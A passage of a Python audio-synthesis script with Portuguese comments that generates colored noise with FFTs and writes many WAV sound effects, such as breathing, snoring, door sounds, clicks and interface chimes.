ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rr=r
r = n.int16(r * float(2**15-1))
w.write('rosa.wav', f_a, r)
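### Black noise
# for each octave, we lose 9 dB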
fator = 10.**(-9/20.)
alphai = fator**(n.log2(fi[i0:]/f0))
c = n.copy(coefs)
c[i0:] = c[i0:]*alphai
# even real part, odd imaginary part
c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j * \
n.imag(c[1:Lambda/2])[::-1]
# time-domain samples of the black noise
ruido = n.fft.ifft(c)
r = n.real(ruido)
r = ((r-r.min())/(r.max()-r.min()))*2-1
rp=r
r = n.int16(r * float(2**15-1))
w.write('preto.wav', f_a, r)
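# The colored-noise blocks above all follow the same recipe; a compact sketch
# (assuming the globals coefs, fi, i0, f0 and Lambda defined above):
#def ruido_colorido(dB_por_oitava):
#    c = n.copy(coefs)
#    c[i0:] = c[i0:]*(10.**(dB_por_oitava/20.))**n.log2(fi[i0:]/f0)
#    c[Lambda/2+1:] = n.real(c[1:Lambda/2])[::-1] - 1j*n.imag(c[1:Lambda/2])[::-1]
#    return n.real(n.fft.ifft(c))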
#w.write('respira.wav', f_a, N(H((
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rr[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#w.write('respira2.wav', f_a, N(H((
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# rp[:int(f_a*.5)],
# rm[:int(f_a*.5)],
# ))))
#
#
#w.write('respira3.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# 5.*adsr(rm[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira4.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rb[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira5.wav', f_a, N(H((
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rr[:int(f_a*.5)],S=-.5,A=360.),
# adsr(rv[:int(f_a*.5)],S=-.5,A=360.),
# ))))
#
#
#w.write('respira6.wav', f_a, N(H((
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rr[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# adsr(rv[:int(f_a*.2)],S=-.5,A=160.,R=10.),
# ))))
#
#
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4.wav', f_a, N(H((
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# s[:f_a/2], n.zeros(f_a/2),
# ))))
##### PISCA TTMPPC
#f0=110.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=1100.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca2_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=11000.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=v(f=ff,d=4.,nu=0.)*a_
#
#w.write('pisca3_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
#
#
#f0=410.
#s=n.zeros(4*f_a)
#kk=(2*n.pi/10)*2. # uma volta
#aa=20. # 10. dB
#for i in xrange(10): # 10 harmonicas
# ff=f0*(1+i)
# n_oitavas=n.log2(ff/f0)
# a_=10.**((n_oitavas*(-25.+aa*n.cos(kk*i))/20.))
# s+=adsr(v(f=ff,d=4.,nu=0.)*a_,S=-5.)
#
#w.write('pisca4_.wav', f_a, N(H((
# s[:f_a/8], n.zeros(f_a/2),
# ))))
#
##### END TTMPPC
w.write('comendo6.wav', f_a, N(fala("O melhor que voce faz com a sua boca, eh servir de toca, para outra cabessa. Nao que voce meressa, esta oportunidade, que vem com a idade, de se curtir em mim.",ss=3500)))
w.write('comendo7.wav', f_a, N(fala("Diga aonde voce vai, que eu vou varrendo, diga aonda voce vai, que eu vou varrendo. Vou varrendo, vou varrendo vou varrendo. Vou varrendo, vou varrendo, vou varrendo.",ss=3500)))
#
#
#w.write('comendo.wav', f_a, N(fala("mahnamnahamhahamnahamhanhamnanhnahamha")))
#w.write('comendo2.wav', f_a, N(fala("manamnaamaamnaamanamnannaama")))
#w.write('comendo3.wav', f_a, N(fala("mnmnmmnmnmnnnm")))
#w.write('comendo4.wav', f_a, N(fala("mnmnmm nmnm nn nmnmnmn")))
#w.write('comendo5.wav', f_a, N(fala("mnhmnhmm nhmhnm nn nhmhnmhnhmn")))
#
#
#w.write('chorando_.wav', f_a, N(fala("bbbbuaaa bbbbbuaaa bbbbuaaa bbbuaaa")))
#
#
#w.write('chorando_2.wav', f_a, N(fala("buaaa bbuaaa buaaa buaaa")))
#
#
#
#w.write('chorando_3.wav', f_a, N(fala("buaaa nheee ee ee nheeee e eeeee bbuaaa buaaa nheeeee eee eeeee buaaa")))
#
#
#w.write('chorando_4.wav', f_a, N(fala("buaaa nheee ee hhh hhh hhh ee nheeehhhh h hh hhe e eeeee bbuhhh h hh haaa buaaa nhhhh hhh eeeee eee hhhhhh h heeeee buaaa")))
#
w.write('coma.wav', f_a, N(H((
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma2.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.5), n.zeros(int(f_a*0.5)),
)),.3))
w.write('coma3.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma4.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*0.1)), v(f=1000.*2.*(3./2),nu=0.,d=0.3), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma5.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*1.5)),
)),.3))
w.write('coma6.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*2.5)),
)),.3))
w.write('coma7.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=0.,d=0.1), n.zeros(int(f_a*3.5)),
)),.3))
w.write('coma8.wav', f_a, N(H((
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
v(f=1000.*2.*(3./2),nu=2.,d=0.1,tab=Tr_i), n.zeros(int(f_a*3.5)),
)),.3))
w.write('respira7.wav', f_a, N(H((
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*1.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*1.5)],S=-.5,A=360.),
))))
w.write('respira8.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=360.),
5.*adsr(rm[:int(f_a*2.5)],S=-.5,A=360.),
))))
w.write('respira9.wav', f_a, N(H((
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(rr[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira91.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rb[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('respira92.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
w.write('dormindo.wav', f_a, N(H((
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
adsr(ra[ :int(f_a*2.5)],S=-.5,A=1160.),
adsr(rv[:int(f_a*2.5)],S=-.5,A=1160.),
))))
# arroto3 arroto6 arroto 9 92
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
w.write('dormindo2.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
adsr(ra,S=-.5,A=1760.),
adsr(rv,S=-.5,A=1760.),
))))
ronco=H((
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
adsr(rp[:int(f_a*0.040)],A=3.,S=-3.,R=10.),
))
w.write('dormindo3.wav', f_a, N(H((
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
ronco,n.zeros(f_a),
))))
w.write('dormindo4.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),ronco,n.zeros(f_a),
))))
w.write('dormindo5.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),10*ronco,n.zeros(f_a),
))))
w.write('dormindo6.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(ra,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
adsr(rv,S=-.5,A=1760.),5*ronco,n.zeros(f_a),
))))
w.write('dormindo7.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),
))))
ronco2=H((
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
adsr(rm[:int(f_a*0.040)],A=5.,S=-3.,R=10.),
))
w.write('dormindo8.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),n.zeros(f_a),ronco2,
))))
w.write('dormindo9.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.,nu=3.,fv=.2),ronco2,
))))
w.write('dormindo91.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i),ronco2,
))))
w.write('dormindo92.wav', f_a, N(H((
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(ra,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
adsr(rv,S=-.5,A=1760.)+H((n.zeros(len(ra)-len(ronco)),5*ronco)),v(440.*2,nu=3.,fv=.2,tabv=D_i[::-1]),ronco2,
))))
w.write('porta_abre.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20.)))
w.write('porta_abre3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_abre4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i)))
w.write('porta_abre7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i)))
w.write('porta_abre8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i)))
w.write('porta_fecha.wav', f_a, N(v(200,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha2.wav', f_a, N(v(800,fv=1./(7*2.),d=1.0,nu=20. , tabv=S_i*-1)))
w.write('porta_fecha3.wav', f_a, N(v(800,fv=1.,d=.5,nu=20.,tabv=D_i)))
w.write('porta_fecha4.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha5.wav', f_a, N(v(2800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Tr_i*-1)))
w.write('porta_fecha6.wav', f_a, N(v(2800,fv=1.,d=.5,nu=2.,tabv=D_i,tab=Tr_i *-1)))
w.write('porta_fecha7.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=D_i *-1)))
w.write('porta_fecha8.wav', f_a, N(v(1800,fv=1.,d=.5,nu=20.,tabv=D_i,tab=Q_i *-1)))
w.write('clique.wav', f_a, N(n.array([0]*100+[1]+[0]*10000)))
w.write('clique2.wav', f_a, N(adsr(v(fv=20,d=.2),S=-3.)))
w.write('clique3.wav', f_a, N(adsr(v(fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique4.wav', f_a, N(adsr(v(f=1000.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('clique5.wav', f_a, N(adsr(v(f=660.,fv=20,d=.2,tab=Tr_i),S=-3.)))
w.write('seleciona.wav', f_a, N(adsr(v(f=460.,fv=1.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('seleciona2.wav', f_a, N(adsr(v(f=460.,fv=10.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela.wav', f_a, N(adsr(v(f=460.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('cancela2.wav', f_a, N(adsr(v(f=40.,fv=100.,d=.1,tab=Tr_i),S=-3.,R=10.)))
w.write('msgPos.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg.wav', f_a, N(H((
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=440.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg2.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgNeg3.wav', f_a, N(H((
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos3.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
w.write('msgPos4.wav', f_a, N(H((
adsr(v(f=840.*(3/4.),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(4./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.*(2**(7./12)),fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
adsr(v(f=840.,fv=0.,nu=0.,d=.1,tab=Tr_i),S=-3.,R=10.),
))))
